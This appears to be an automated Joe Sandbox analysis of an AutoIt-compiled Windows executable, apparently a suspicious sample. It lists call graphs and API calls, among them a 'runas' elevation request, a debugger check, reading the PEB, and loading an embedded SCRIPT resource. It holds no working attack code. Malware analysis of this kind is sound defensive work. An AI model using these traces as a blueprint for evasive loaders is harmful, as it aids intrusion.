106335 f17b2e 59 API calls 106334->106335 106336 f74163 106335->106336 106411 f74223 59 API calls 106336->106411 106338 f74172 106412 f74223 59 API calls 106338->106412 106340 f74185 106354 f79162 __ftell_nolock 106353->106354 106355 f30db6 Mailbox 59 API calls 106354->106355 106356 f791bf 106355->106356 106357 f1522e 59 API calls 106356->106357 106358 f791c9 106357->106358 106359 f78f5f GetSystemTimeAsFileTime 106358->106359 106360 f791d4 106359->106360 106361 f14ee5 85 API calls 106360->106361 106362 f791e7 _wcscmp 106361->106362 106363 f7920b 106362->106363 106364 f792b8 106362->106364 106365 f79734 96 API calls 106363->106365 106366 f79734 96 API calls 106364->106366 106367 f79210 106365->106367 106381 f79284 _wcscat 106366->106381 106370 f792c1 106367->106370 106430 f340fb 58 API calls __wsplitpath_helper 106367->106430 106369 f14f0b 74 API calls 106371 f792dd 106369->106371 106370->106198 106372 f14f0b 74 API calls 106371->106372 106374 f792ed 106372->106374 106373 f79239 _wcscat _wcscpy 106431 f340fb 58 API calls __wsplitpath_helper 106373->106431 106375 f14f0b 74 API calls 106374->106375 106377 f79308 106375->106377 106378 f14f0b 74 API calls 106377->106378 106379 f79318 106378->106379 106380 f14f0b 74 API calls 106379->106380 106382 f79333 106380->106382 106381->106369 106381->106370 106383 f14f0b 74 API calls 106382->106383 106384 f79343 106383->106384 106385 f14f0b 74 API calls 106384->106385 106386 f79353 106385->106386 106408->106125 106409->106163 106410->106175 106411->106338 106412->106340 106430->106373 106431->106381 106451->106044 106452->106041 106453 f11066 106458 f1f76f 106453->106458 106455 f1106c 106456 f32d40 __cinit 67 API calls 106455->106456 106457 f11076 106456->106457 106459 f1f790 106458->106459 106491 f2ff03 106459->106491 106463 f1f7d7 106464 f17667 59 API calls 106463->106464 106465 f1f7e1 106464->106465 106466 f17667 59 API calls 106465->106466 106467 f1f7eb 106466->106467 106468 f17667 59 API calls 106467->106468 106469 f1f7f5 106468->106469 106470 f17667 59 API calls 106469->106470 106471 f1f833 106470->106471 106472 f17667 59 API calls 106471->106472 106473 f1f8fe 106472->106473 106501 f25f87 106473->106501 106477 f1f930 106478 f17667 59 API calls 106477->106478 106479 f1f93a 106478->106479 106529 f2fd9e 106479->106529 106481 f1f981 106482 f1f991 GetStdHandle 106481->106482 106483 f1f9dd 106482->106483 106484 f545ab 106482->106484 106485 f1f9e5 OleInitialize 106483->106485 106484->106483 106486 f545b4 106484->106486 106485->106455 106536 f76b38 64 API calls Mailbox 106486->106536 106488 f545bb 106537 f77207 CreateThread 106488->106537 106490 f545c7 CloseHandle 106490->106485 106538 f2ffdc 106491->106538 106494 f2ffdc 59 API calls 106495 f2ff45 106494->106495 106496 f17667 59 API calls 106495->106496 106497 f2ff51 106496->106497 106498 f17bcc 59 API calls 106497->106498 106499 f1f796 106498->106499 106500 f30162 6 API calls 106499->106500 106500->106463 106502 f17667 59 API calls 106501->106502 106503 f25f97 106502->106503 106504 f17667 59 API calls 106503->106504 106505 f25f9f 106504->106505 106545 f25a9d 106505->106545 106508 f25a9d 59 API calls 106509 f25faf 106508->106509 106510 f17667 59 API calls 106509->106510 106511 f25fba 106510->106511 106512 f30db6 Mailbox 59 API calls 106511->106512 106513 f1f908 106512->106513 106514 f260f9 106513->106514 106515 f26107 106514->106515 106516 f17667 59 API calls 106515->106516 106517 f26112 106516->106517 106518 f17667 59 API calls 106517->106518 106519 f2611d 106518->106519 106520 f17667 59 API calls 106519->106520 106521 f26128 106520->106521 106522 f17667 59 API calls 106521->106522 106523 f26133 106522->106523 106524 f25a9d 59 API calls 106523->106524 106525 f2613e 106524->106525 106526 f30db6 Mailbox 59 API calls 106525->106526 106527 f26145 RegisterWindowMessageW 106526->106527 106527->106477 106530 f6576f 106529->106530 106531 f2fdae 106529->106531 106548 f79ae7 60 API calls 106530->106548 106532 f30db6 Mailbox 59 API calls 106531->106532 106534 f2fdb6 106532->106534 106534->106481 106535 f6577a 106536->106488 106537->106490 106549 f771ed 65 API calls 106537->106549 106539 f17667 59 API calls 106538->106539 106540 f2ffe7 106539->106540 106541 f17667 59 API calls 106540->106541 106542 f2ffef 106541->106542 106543 f17667 59 API calls 106542->106543 106544 f2ff3b 106543->106544 106544->106494 106546 f17667 59 API calls 106545->106546 106547 f25aa5 106546->106547 106547->106508 106548->106535 106550 f11016 106555 f14974 106550->106555 106553 f32d40 __cinit 67 API calls 106554 f11025 106553->106554 106556 f30db6 Mailbox 59 API calls 106555->106556 106557 f1497c 106556->106557 106558 f1101b 106557->106558 106562 f14936 106557->106562 106558->106553 106563 f14951 106562->106563 106564 f1493f 106562->106564 106566 f149a0 106563->106566 106565 f32d40 __cinit 67 API calls 106564->106565 106565->106563 106567 f17667 59 API calls 106566->106567 106568 f149b8 GetVersionExW 106567->106568 106569 f17bcc 59 API calls 106568->106569 106570 f149fb 106569->106570 106571 f17d2c 59 API calls 106570->106571 106578 f14a28 106570->106578 106572 f14a1c 106571->106572 106573 f17726 59 API calls 106572->106573 106573->106578 106574 f14a93 GetCurrentProcess IsWow64Process 106575 f14aac 106574->106575 106576 f14ac2 106575->106576 106577 f14b2b GetSystemInfo 106575->106577 106590 f14b37 106576->106590 106581 f14af8 106577->106581 106578->106574 106579 f4d864 106578->106579 106581->106558 106583 f14ad4 106585 f14b37 2 API calls 106583->106585 106584 f14b1f GetSystemInfo 106586 f14ae9 106584->106586 106587 f14adc GetNativeSystemInfo 106585->106587 106586->106581 106588 f14aef FreeLibrary 106586->106588 106587->106586 106588->106581 106591 f14ad0 106590->106591 106592 f14b40 LoadLibraryA 106590->106592 106591->106583 106591->106584 106592->106591 106593 f14b51 GetProcAddress 106592->106593 106593->106591 106594 f4fdfc 106627 f1ab30 Mailbox _memmove 106594->106627 106598 f30db6 59 API calls Mailbox 106598->106627 106601 f1b525 106657 f79e4a 89 API calls 4 library calls 106601->106657 106602 f30db6 59 API calls Mailbox 106618 f19f37 Mailbox 106602->106618 106603 f50055 106656 f79e4a 89 API calls 4 library calls 106603->106656 106605 f1b475 106612 f18047 59 API calls 106605->106612 106608 f50064 106609 f1b47a 106609->106603 106623 f509e5 106609->106623 106621 f1a057 106612->106621 106614 f18047 59 API calls 106614->106618 106615 f17667 59 API calls 106615->106618 106616 f66e8f 59 API calls 106616->106618 106617 f17de1 59 API calls 106617->106627 106618->106602 106618->106603 106618->106605 106618->106609 106618->106614 106618->106615 106618->106616 106619 f509d6 106618->106619 106618->106621 106622 f32d40 67 API calls __cinit 106618->106622 106624 f1a55a 106618->106624 106645 f1c8c0 341 API calls 2 library calls 106618->106645 106646 f1b900 60 API calls Mailbox 106618->106646 106662 f79e4a 89 API calls 4 library calls 106619->106662 106622->106618 106663 f79e4a 89 API calls 4 library calls 106623->106663 106661 f79e4a 89 API calls 4 library calls 106624->106661 106627->106598 106627->106601 106627->106617 106627->106618 106627->106621 106628 f19ea0 341 API calls 106627->106628 106630 f5086a 106627->106630 106632 f50878 106627->106632 106634 f5085c 106627->106634 106635 f1b21c 106627->106635 106638 f66e8f 59 API calls 106627->106638 106640 f1b2b6 106627->106640 106642 f8df23 106627->106642 106647 f19c90 59 API calls Mailbox 106627->106647 106651 f8c193 85 API calls 2 library calls 106627->106651 106652 f8c2e0 96 API calls Mailbox 106627->106652 106653 f77956 59 API calls Mailbox 106627->106653 106654 f8bc6b 341 API calls Mailbox 106627->106654 106655 f6617e 59 API calls Mailbox 106627->106655 106628->106627 106659 f19c90 59 API calls Mailbox 106630->106659 106660 f79e4a 89 API calls 4 library calls 106632->106660 106634->106621 106658 f6617e 59 API calls Mailbox 106634->106658 106648 f19d3c 60 API calls Mailbox 106635->106648 106637 f1b22d 106649 f19d3c 60 API calls Mailbox 106637->106649 106638->106627 106650 f1f6a3 341 API calls 106640->106650 106643 f8cadd 130 API calls 106642->106643 106644 f8df33 106643->106644 106644->106627 106645->106618 106646->106618 106647->106627 106648->106637 106649->106640 106650->106601 106651->106627 106652->106627 106653->106627 106654->106627 106655->106627 106656->106608 106657->106634 106658->106621 106659->106634 106660->106634 106661->106621 106662->106623 106663->106621 106664 17a86f0 106678 17a6340 106664->106678 106666 17a87ab 106681 17a85e0 106666->106681 106684 17a97d0 GetPEB 106678->106684 106680 17a69cb 106680->106666 106682 17a85e9 Sleep 106681->106682 106683 17a85f7 106682->106683 106685 17a97fa 106684->106685 106685->106680 106686 f5416f 106690 f65fe6 106686->106690 106688 f5417a 106689 f65fe6 85 API calls 106688->106689 106689->106688 106695 f65ff3 106690->106695 106696 f66020 106690->106696 106691 f66022 106702 f19328 84 API calls Mailbox 106691->106702 106692 f66027 106694 f19837 84 API calls 106692->106694 106697 f6602e 106694->106697 106695->106691 106695->106692 106695->106696 106699 f6601a 106695->106699 106696->106688 106698 f17b2e 59 API calls 106697->106698 106698->106696 106701 f195a0 59 API calls _wcsstr 106699->106701 106701->106696 106702->106692 106703 f78d0d 106704 f78d1a 106703->106704 106709 f78d20 106703->106709 106705 f32d55 _free 58 API calls 106704->106705 106705->106709 106706 f32d55 _free 58 API calls 106708 f78d31 106706->106708 106707 f78d43 106708->106707 106710 f32d55 _free 58 API calls 106708->106710 106709->106706 106709->106708 106710->106707 106711 f1107d 106716 f1708b 106711->106716 106713 f1108c 106714 f32d40 __cinit 67 API calls 106713->106714 106715 f11096 106714->106715 106717 f1709b __ftell_nolock 106716->106717 106718 f17667 59 API calls 106717->106718 106719 f17151 106718->106719 106720 f14706 61 API calls 106719->106720 106721 f1715a 106720->106721 106747 f3050b 106721->106747 106724 f17cab 59 API calls 106725 f17173 106724->106725 106726 f13f74 59 API calls 106725->106726 106727 f17182 106726->106727 106728 f17667 59 API calls 106727->106728 106729 f1718b 106728->106729 106730 f17d8c 59 API calls 106729->106730 106731 f17194 RegOpenKeyExW 106730->106731 106732 f4e8b1 RegQueryValueExW 106731->106732 106736 f171b6 Mailbox 106731->106736 106733 f4e943 RegCloseKey 106732->106733 106734 f4e8ce 106732->106734 106733->106736 106745 f4e955 _wcscat Mailbox __NMSG_WRITE 106733->106745 106735 f30db6 Mailbox 59 API calls 106734->106735 106737 f4e8e7 106735->106737 106736->106713 106738 f1522e 59 API calls 106737->106738 106739 f4e8f2 RegQueryValueExW 106738->106739 106740 f4e90f 106739->106740 106742 f4e929 106739->106742 106741 f17bcc 59 API calls 106740->106741 106741->106742 106742->106733 106743 f17de1 59 API calls 106743->106745 106744 f13f74 59 API calls 106744->106745 106745->106736 106745->106743 106745->106744 106746 f179f2 59 API calls 106745->106746 106746->106745 106748 f41940 __ftell_nolock 106747->106748 106749 f30518 GetFullPathNameW 106748->106749 106750 f3053a 106749->106750 106751 f17bcc 59 API calls 106750->106751 106752 f17165 106751->106752 106752->106724

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F13B68
                                                              • IsDebuggerPresent.KERNEL32 ref: 00F13B7A
                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00FD52F8,00FD52E0,?,?), ref: 00F13BEB
                                                                • Part of subcall function 00F17BCC: _memmove.LIBCMT ref: 00F17C06
                                                                • Part of subcall function 00F2092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F13C14,00FD52F8,?,?,?), ref: 00F2096E
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F13C6F
                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00FC7770,00000010), ref: 00F4D281
                                                              • SetCurrentDirectoryW.KERNEL32(?,00FD52F8,?,?,?), ref: 00F4D2B9
                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00FC4260,00FD52F8,?,?,?), ref: 00F4D33F
                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00F4D346
                                                                • Part of subcall function 00F13A46: GetSysColorBrush.USER32(0000000F), ref: 00F13A50
                                                                • Part of subcall function 00F13A46: LoadCursorW.USER32(00000000,00007F00), ref: 00F13A5F
                                                                • Part of subcall function 00F13A46: LoadIconW.USER32(00000063), ref: 00F13A76
                                                                • Part of subcall function 00F13A46: LoadIconW.USER32(000000A4), ref: 00F13A88
                                                                • Part of subcall function 00F13A46: LoadIconW.USER32(000000A2), ref: 00F13A9A
                                                                • Part of subcall function 00F13A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F13AC0
                                                                • Part of subcall function 00F13A46: RegisterClassExW.USER32(?), ref: 00F13B16
                                                                • Part of subcall function 00F139D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F13A03
                                                                • Part of subcall function 00F139D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F13A24
                                                                • Part of subcall function 00F139D5: ShowWindow.USER32(00000000,?,?), ref: 00F13A38
                                                                • Part of subcall function 00F139D5: ShowWindow.USER32(00000000,?,?), ref: 00F13A41
                                                                • Part of subcall function 00F1434A: _memset.LIBCMT ref: 00F14370
                                                                • Part of subcall function 00F1434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F14415
                                                              Strings
                                                              • runas, xrefs: 00F4D33A
                                                              • This is a third-party compiled AutoIt script., xrefs: 00F4D279
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                                              • API String ID: 529118366-3287110873
                                                              • Opcode ID: 8652ad159c1d8d3bd85ee8bf9e1c5967fd77c32d8d8860a04fdb2d13a28b3035
                                                              • Instruction ID: b95517c3417162a1a8856af6ec6d7db69be79307e9d88189a26d4f4433b149fb
                                                              • Opcode Fuzzy Hash: 8652ad159c1d8d3bd85ee8bf9e1c5967fd77c32d8d8860a04fdb2d13a28b3035
                                                              • Instruction Fuzzy Hash: B1513B71D0824CAECF01EBB4DC06EED7B76AF45B11F04406BF415A2252DA749689FB61

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 996 f149a0-f14a00 call f17667 GetVersionExW call f17bcc 1001 f14a06 996->1001 1002 f14b0b-f14b0d 996->1002 1003 f14a09-f14a0e 1001->1003 1004 f4d767-f4d773 1002->1004 1006 f14b12-f14b13 1003->1006 1007 f14a14 1003->1007 1005 f4d774-f4d778 1004->1005 1008 f4d77a 1005->1008 1009 f4d77b-f4d787 1005->1009 1010 f14a15-f14a4c call f17d2c call f17726 1006->1010 1007->1010 1008->1009 1009->1005 1011 f4d789-f4d78e 1009->1011 1019 f4d864-f4d867 1010->1019 1020 f14a52-f14a53 1010->1020 1011->1003 1013 f4d794-f4d79b 1011->1013 1013->1004 1015 f4d79d 1013->1015 1018 f4d7a2-f4d7a5 1015->1018 1021 f14a93-f14aaa GetCurrentProcess IsWow64Process 1018->1021 1022 f4d7ab-f4d7c9 1018->1022 1023 f4d880-f4d884 1019->1023 1024 f4d869 1019->1024 1020->1018 1025 f14a59-f14a64 1020->1025 1032 f14aac 1021->1032 1033 f14aaf-f14ac0 1021->1033 1022->1021 1026 f4d7cf-f4d7d5 1022->1026 1030 f4d886-f4d88f 1023->1030 1031 f4d86f-f4d878 1023->1031 1027 f4d86c 1024->1027 1028 f14a6a-f14a6c 1025->1028 1029 f4d7ea-f4d7f0 1025->1029 1036 f4d7d7-f4d7da 1026->1036 1037 f4d7df-f4d7e5 1026->1037 1027->1031 1038 f4d805-f4d811 1028->1038 1039 f14a72-f14a75 1028->1039 1040 f4d7f2-f4d7f5 1029->1040 1041 f4d7fa-f4d800 1029->1041 1030->1027 1042 f4d891-f4d894 1030->1042 1031->1023 1032->1033 1034 f14ac2-f14ad2 call f14b37 1033->1034 1035 f14b2b-f14b35 GetSystemInfo 1033->1035 1053 f14ad4-f14ae1 call f14b37 1034->1053 1054 f14b1f-f14b29 GetSystemInfo 1034->1054 1048 f14af8-f14b08 1035->1048 1036->1021 1037->1021 1043 f4d813-f4d816 1038->1043 1044 f4d81b-f4d821 1038->1044 1046 f4d831-f4d834 1039->1046 1047 f14a7b-f14a8a 1039->1047 1040->1021 1041->1021 1042->1031 1043->1021 1044->1021 1046->1021 1050 f4d83a-f4d84f 1046->1050 1051 f14a90 1047->1051 1052 f4d826-f4d82c 1047->1052 1055 f4d851-f4d854 1050->1055 1056 f4d859-f4d85f 1050->1056 1051->1021 1052->1021 1061 f14ae3-f14ae7 GetNativeSystemInfo 1053->1061 1062 f14b18-f14b1d 1053->1062 1058 f14ae9-f14aed 1054->1058 1055->1021 1056->1021 1058->1048 1060 f14aef-f14af2 FreeLibrary 1058->1060 1060->1048 1061->1058 1062->1061
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 00F149CD
                                                                • Part of subcall function 00F17BCC: _memmove.LIBCMT ref: 00F17C06
                                                              • GetCurrentProcess.KERNEL32(?,00F9FAEC,00000000,00000000,?), ref: 00F14A9A
                                                              • IsWow64Process.KERNEL32(00000000), ref: 00F14AA1
                                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00F14AE7
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00F14AF2
                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00F14B23
                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00F14B2F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                              • String ID:
                                                              • API String ID: 1986165174-0
                                                              • Opcode ID: ce0b1b555a17baa116c142dfb7c66a9f4feb7eb4ea17b74c00483ee9dba98cf3
                                                              • Instruction ID: f0fe9e957ef966286836dec627771f20b41e810ad6078ddfc2576cd1ddbbdce2
                                                              • Opcode Fuzzy Hash: ce0b1b555a17baa116c142dfb7c66a9f4feb7eb4ea17b74c00483ee9dba98cf3
                                                              • Instruction Fuzzy Hash: D091E53198D7C0DEC731DB6894502EAFFF5AF6A310B08496ED0CB93A41D224B588E759

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1063 f14e89-f14ea1 CreateStreamOnHGlobal 1064 f14ec1-f14ec6 1063->1064 1065 f14ea3-f14eba FindResourceExW 1063->1065 1066 f14ec0 1065->1066 1067 f4d933-f4d942 LoadResource 1065->1067 1066->1064 1067->1066 1068 f4d948-f4d956 SizeofResource 1067->1068 1068->1066 1069 f4d95c-f4d967 LockResource 1068->1069 1069->1066 1070 f4d96d-f4d98b 1069->1070 1070->1066
                                                              APIs
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00F14D8E,?,?,00000000,00000000), ref: 00F14E99
                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F14D8E,?,?,00000000,00000000), ref: 00F14EB0
                                                              • LoadResource.KERNEL32(?,00000000,?,?,00F14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F14E2F), ref: 00F4D937
                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00F14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F14E2F), ref: 00F4D94C
                                                              • LockResource.KERNEL32(00F14D8E,?,?,00F14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F14E2F,00000000), ref: 00F4D95F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                              • String ID: SCRIPT
                                                              • API String ID: 3051347437-3967369404
                                                              • Opcode ID: f179477eb21309d5be64f1ac895832787ea933564728e7f56bee9e75c7fcb8d1
                                                              • Instruction ID: bca58ef64ed9e513f0359f6c97a60425bbec6921cde8675d7e4db35e88594449
                                                              • Opcode Fuzzy Hash: f179477eb21309d5be64f1ac895832787ea933564728e7f56bee9e75c7fcb8d1
                                                              • Instruction Fuzzy Hash: 56117CB5640704BFEB218B65EC48F677BBAFBC5B21F20426DF406C6250DB71EC44AA60
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00F4E398), ref: 00F7446A
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00F7447B
                                                              • FindClose.KERNEL32(00000000), ref: 00F7448B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirst
                                                              • String ID:
                                                              • API String ID: 48322524-0
                                                              • Opcode ID: 6060743ff1a4c37085cc3c78542259d417324fc06caa8e4bd2d88412564e54df
                                                              • Instruction ID: 801868772f813a9fba7535cd9038a629dcc52a6c6828bef57a306e06f1e39ad0
                                                              • Opcode Fuzzy Hash: 6060743ff1a4c37085cc3c78542259d417324fc06caa8e4bd2d88412564e54df
                                                              • Instruction Fuzzy Hash: 93E0D833810504674210AF38EC0D9E9775C9E05335F244717FC39C10D0E7746904B996
                                                              Strings
                                                              • Variable must be of type 'Object'., xrefs: 00F53E62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Variable must be of type 'Object'.
                                                              • API String ID: 0-109567571
                                                              • Opcode ID: 628ab640eaa217707f0fd6765e6e451707566ef4cbc169fbca05fcf0c04eebc1
                                                              • Instruction ID: a2afcc5e4c21016760d6ade39d8ae141a42a71a719a89cca4f228574a794323c
                                                              • Opcode Fuzzy Hash: 628ab640eaa217707f0fd6765e6e451707566ef4cbc169fbca05fcf0c04eebc1
                                                              • Instruction Fuzzy Hash: 63A26B75E00209CBCB14CF58C880AEAB7B2FF59324F64805AED05AB351D775ED86EB91
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F20A5B
                                                              • timeGetTime.WINMM ref: 00F20D16
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F20E53
                                                              • Sleep.KERNEL32(0000000A), ref: 00F20E61
                                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 00F20EFA
                                                              • DestroyWindow.USER32 ref: 00F20F06
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F20F20
                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00F54E83
                                                              • TranslateMessage.USER32(?), ref: 00F55C60
                                                              • DispatchMessageW.USER32(?), ref: 00F55C6E
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F55C82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                              • API String ID: 4212290369-3242690629
                                                              • Opcode ID: 2c5383e1fc4f6a1a47689c84e14a5b7604f1367983078580970dd1cdc7b79fdd
                                                              • Instruction ID: 5ebd7e4030c60cf08f840d4c67e2be971c0a4bcd4022de1755132ca3204d4925
                                                              • Opcode Fuzzy Hash: 2c5383e1fc4f6a1a47689c84e14a5b7604f1367983078580970dd1cdc7b79fdd
                                                              • Instruction Fuzzy Hash: BAB22471A08741DFD724DF24C894BAAB7E1BF84714F14491DF949872A2CB75E888FB82

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00F78F5F: __time64.LIBCMT ref: 00F78F69
                                                                • Part of subcall function 00F14EE5: _fseek.LIBCMT ref: 00F14EFD
                                                              • __wsplitpath.LIBCMT ref: 00F79234
                                                                • Part of subcall function 00F340FB: __wsplitpath_helper.LIBCMT ref: 00F3413B
                                                              • _wcscpy.LIBCMT ref: 00F79247
                                                              • _wcscat.LIBCMT ref: 00F7925A
                                                              • __wsplitpath.LIBCMT ref: 00F7927F
                                                              • _wcscat.LIBCMT ref: 00F79295
                                                              • _wcscat.LIBCMT ref: 00F792A8
                                                                • Part of subcall function 00F78FA5: _memmove.LIBCMT ref: 00F78FDE
                                                                • Part of subcall function 00F78FA5: _memmove.LIBCMT ref: 00F78FED
                                                              • _wcscmp.LIBCMT ref: 00F791EF
                                                                • Part of subcall function 00F79734: _wcscmp.LIBCMT ref: 00F79824
                                                                • Part of subcall function 00F79734: _wcscmp.LIBCMT ref: 00F79837
                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F79452
                                                              • _wcsncpy.LIBCMT ref: 00F794C5
                                                              • DeleteFileW.KERNEL32(?,?), ref: 00F794FB
